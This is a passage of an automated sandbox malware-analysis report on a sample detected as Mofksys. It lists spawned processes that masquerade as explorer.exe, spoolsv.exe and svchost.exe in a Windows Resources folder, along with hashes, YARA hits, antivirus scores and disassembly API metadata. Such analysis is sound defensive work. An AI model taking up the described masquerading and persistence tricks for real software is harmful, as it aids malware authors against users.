                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000002.2372041584.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000003.2273075923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                      Start time:02:27:27
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:c:\windows\resources\themes\explorer.exe
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'859'063 bytes
                                                                                                                                                                                                                                      MD5 hash:805C1BF19E32C7B484F3555C6A3BE527
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000003.2298339937.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000002.3375931063.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:02:27:29
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:c:\windows\resources\spoolsv.exe SE
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'858'917 bytes
                                                                                                                                                                                                                                      MD5 hash:08CFDA44CEE577DA294331E5F9615605
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000006.00000002.2370477599.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000006.00000003.2324309344.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:02:27:31
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:c:\windows\resources\svchost.exe
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'858'879 bytes
                                                                                                                                                                                                                                      MD5 hash:A2D31781CBA01F1BCB14F06D4CF851BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000003.2343834578.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                      Start time:02:27:33
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:c:\windows\resources\spoolsv.exe PR
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'858'917 bytes
                                                                                                                                                                                                                                      MD5 hash:08CFDA44CEE577DA294331E5F9615605
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000002.2372208986.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000003.2361376513.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                      Start time:02:27:44
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'859'063 bytes
                                                                                                                                                                                                                                      MD5 hash:805C1BF19E32C7B484F3555C6A3BE527
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                      Start time:02:27:44
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                      Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                      Start time:02:27:45
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'859'063 bytes
                                                                                                                                                                                                                                      MD5 hash:805C1BF19E32C7B484F3555C6A3BE527
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000002.2484557190.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000003.2481892944.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:02:27:52
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\windows\resources\svchost.exe" RO
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'858'879 bytes
                                                                                                                                                                                                                                      MD5 hash:A2D31781CBA01F1BCB14F06D4CF851BD
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:02:27:52
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\consent.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:consent.exe 6016 322 0000022C4F0331F0
                                                                                                                                                                                                                                      Imagebase:0x7ff7d8700000
                                                                                                                                                                                                                                      File size:186'704 bytes
                                                                                                                                                                                                                                      MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:02:27:53
                                                                                                                                                                                                                                      Start date:16/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\windows\resources\svchost.exe" RO
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:5'858'879 bytes
                                                                                                                                                                                                                                      MD5 hash:A2D31781CBA01F1BCB14F06D4CF851BD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000011.00000003.2566321903.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000011.00000002.2567275778.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:7.4%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:33
                                                                                                                                                                                                                                        Total number of Limit Nodes:5
                                                                                                                                                                                                                                        execution_graph 15016 519ad38 15019 519ae30 15016->15019 15017 519ad47 15020 519ae64 15019->15020 15022 519ae41 15019->15022 15020->15017 15021 519b068 GetModuleHandleW 15023 519b095 15021->15023 15022->15020 15022->15021 15023->15017 15024 519d0b8 15025 519d0fe GetCurrentProcess 15024->15025 15027 519d150 GetCurrentThread 15025->15027 15029 519d149 15025->15029 15028 519d18d GetCurrentProcess 15027->15028 15030 519d186 15027->15030 15031 519d1c3 15028->15031 15029->15027 15030->15028 15032 519d1eb GetCurrentThreadId 15031->15032 15033 519d21c 15032->15033 15034 5194668 15035 5194684 15034->15035 15036 5194696 15035->15036 15038 51947a0 15035->15038 15039 51947c5 15038->15039 15043 51948a1 15039->15043 15047 51948b0 15039->15047 15045 51948b0 15043->15045 15044 51949b4 15044->15044 15045->15044 15051 5194248 15045->15051 15049 51948d7 15047->15049 15048 51949b4 15048->15048 15049->15048 15050 5194248 CreateActCtxA 15049->15050 15050->15048 15052 5195940 CreateActCtxA 15051->15052 15054 5195a03 15052->15054 15055 519d300 DuplicateHandle 15056 519d396 15055->15056

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 0519D0A8 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0519D136
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0519D173
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0519D1B0
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0519D209
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                        • Opcode ID: 9589ccad2c52732de5f6df006c314b017951b9f17d9ac2f05faad3218f47e5db
                                                                                                                                                                                                                                        • Instruction ID: 094d8458f3609a1fe26edb5848343cded481936b953166ceb6dc32cc062224e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9589ccad2c52732de5f6df006c314b017951b9f17d9ac2f05faad3218f47e5db
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE5146B190134ACFDB48DFA9E548B9EBFF1BF88314F208459E019AB3A0DB745944CB65
                                                                                                                                                                                                                                        Function 0519D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0519D136
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0519D173
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0519D1B0
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0519D209
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                        • Opcode ID: 9eaea86d0519676e7aef9435d4b209490d77800b622b27e24679bc9755c3c4e5
                                                                                                                                                                                                                                        • Instruction ID: 9fa77b3552f13d9f9a70c76a69708f1bf9285ef019d34ba155383877fd6d7c6e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9eaea86d0519676e7aef9435d4b209490d77800b622b27e24679bc9755c3c4e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 745157B190134A8FDB18DFAAE548B9EBFF1FF88314F208459E019A73A0DB745944CB65
                                                                                                                                                                                                                                        Function 0519AE30 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 44 519ae30-519ae3f 45 519ae6b-519ae6f 44->45 46 519ae41-519ae4e call 5199838 44->46 48 519ae71-519ae7b 45->48 49 519ae83-519aec4 45->49 52 519ae50 46->52 53 519ae64 46->53 48->49 55 519aed1-519aedf 49->55 56 519aec6-519aece 49->56 102 519ae56 call 519b0b8 52->102 103 519ae56 call 519b0c8 52->103 53->45 57 519aee1-519aee6 55->57 58 519af03-519af05 55->58 56->55 60 519aee8-519aeef call 519a814 57->60 61 519aef1 57->61 63 519af08-519af0f 58->63 59 519ae5c-519ae5e 59->53 62 519afa0-519afb7 59->62 65 519aef3-519af01 60->65 61->65 77 519afb9-519b018 62->77 66 519af1c-519af23 63->66 67 519af11-519af19 63->67 65->63 70 519af30-519af39 call 519a824 66->70 71 519af25-519af2d 66->71 67->66 75 519af3b-519af43 70->75 76 519af46-519af4b 70->76 71->70 75->76 78 519af69-519af76 76->78 79 519af4d-519af54 76->79 95 519b01a-519b060 77->95 86 519af99-519af9f 78->86 87 519af78-519af96 78->87 79->78 80 519af56-519af66 call 519a834 call 519a844 79->80 80->78 87->86 97 519b068-519b093 GetModuleHandleW 95->97 98 519b062-519b065 95->98 99 519b09c-519b0b0 97->99 100 519b095-519b09b 97->100 98->97 100->99 102->59 103->59
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0519B086
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                                        • Opcode ID: 7ded57591eedebaa00b060bc0cd5f7c2ec6a8d6a56c27db353e23cf4913365f3
                                                                                                                                                                                                                                        • Instruction ID: 1a63bc65c922cfea1a0f63d8ba24004c0f521556096b3d7826368c5ad4c62273
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ded57591eedebaa00b060bc0cd5f7c2ec6a8d6a56c27db353e23cf4913365f3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 367138B0A00B058FDB28DF69D4457AABBF1FF88704F00892DD48AD7A50DB75E849CB91
                                                                                                                                                                                                                                        Function 05194248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 104 5194248-5195a01 CreateActCtxA 107 5195a0a-5195a64 104->107 108 5195a03-5195a09 104->108 115 5195a73-5195a77 107->115 116 5195a66-5195a69 107->116 108->107 117 5195a79-5195a85 115->117 118 5195a88 115->118 116->115 117->118 120 5195a89 118->120 120->120
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 051959F1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                                        • Opcode ID: df26a6cf469d9e3e09d69a697c8ac2466cba0938924a298f6d8f383e6cb5c9c1
                                                                                                                                                                                                                                        • Instruction ID: f75e69781ddef0e05777f0474736b5fa59a743da64cf789b081b5a66ff1ebe48
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df26a6cf469d9e3e09d69a697c8ac2466cba0938924a298f6d8f383e6cb5c9c1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8741EFB0C00719CBDB29CFA9C984B9DBBF6BF49304F20806AD408BB251DBB56945CF95
                                                                                                                                                                                                                                        Function 05195935 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 121 5195935-519593c 122 5195944-5195a01 CreateActCtxA 121->122 124 5195a0a-5195a64 122->124 125 5195a03-5195a09 122->125 132 5195a73-5195a77 124->132 133 5195a66-5195a69 124->133 125->124 134 5195a79-5195a85 132->134 135 5195a88 132->135 133->132 134->135 137 5195a89 135->137 137->137
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 051959F1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                                        • Opcode ID: 9a93620a70113adf1994fb75864deb1fdf5b138cf91428a5e84d834f06f6ca4e
                                                                                                                                                                                                                                        • Instruction ID: d12732462b58a7f354e09149bcf6802c12527f0be8189bed4eb4e8cedc547022
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a93620a70113adf1994fb75864deb1fdf5b138cf91428a5e84d834f06f6ca4e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E541EEB1C00719CADB25CFA9C984B8DBBB6BF49304F20846AD408BB255DB756945CF91
                                                                                                                                                                                                                                        Function 0519D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 138 519d300-519d394 DuplicateHandle 139 519d39d-519d3ba 138->139 140 519d396-519d39c 138->140 140->139
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0519D387
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                        • Opcode ID: caa91b862b725f22dc6e65719d7b5314c41a64710c11c0e358e0e16c196c20f4
                                                                                                                                                                                                                                        • Instruction ID: 2656cc9a6984d3586d0833406176ac9d1af55ee50b6720eea9de25718e051656
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caa91b862b725f22dc6e65719d7b5314c41a64710c11c0e358e0e16c196c20f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3721C4B5900249DFDB10CF9AD984ADEBFF4FB48320F14841AE918A3350D378A954CFA5
                                                                                                                                                                                                                                        Function 0519D2F9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 143 519d2f9-519d394 DuplicateHandle 144 519d39d-519d3ba 143->144 145 519d396-519d39c 143->145 145->144
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0519D387
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                        • Opcode ID: 09dd6be8e467986b88272367884238575f8d9027bada370aaa9b667704b5248e
                                                                                                                                                                                                                                        • Instruction ID: 2a7cad4386db43d62b99a0654156d86c9de831b2fb287b9b7927c5e432dc6241
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09dd6be8e467986b88272367884238575f8d9027bada370aaa9b667704b5248e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5421B2B5900209EFDB10CF9AD585ADEBBF5AB48214F14841AE918A3250D378A954CF65
                                                                                                                                                                                                                                        Function 0519B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 148 519b020-519b060 149 519b068-519b093 GetModuleHandleW 148->149 150 519b062-519b065 148->150 151 519b09c-519b0b0 149->151 152 519b095-519b09b 149->152 150->149 152->151
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0519B086
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3379805022.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_5190000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                                        • Opcode ID: a28022074c6b42b934fa3767a8057681c97ae369c8db6703e742456dc303d5a9
                                                                                                                                                                                                                                        • Instruction ID: 235f336236c7a8e83de5fa1928743ab59efb7e77d4bae5a8a092f04109266ef4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a28022074c6b42b934fa3767a8057681c97ae369c8db6703e742456dc303d5a9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61110FB6C043498FCB24CF9AD444A9EFBF4AF88224F24842AD429B7210C379A545CFA1
                                                                                                                                                                                                                                        Function 010DD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.3377407781.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_10dd000_system32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9bc8ab540ac448bd83110821e734ad4996af306d1fbeffcffecf6d2284814c2a
                                                                                                                                                                                                                                        • Instruction ID: f622fd1e9f990c0369f1c0d965729bf559fe6cb122cb168ee904fba9ccf20665
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bc8ab540ac448bd83110821e734ad4996af306d1fbeffcffecf6d2284814c2a
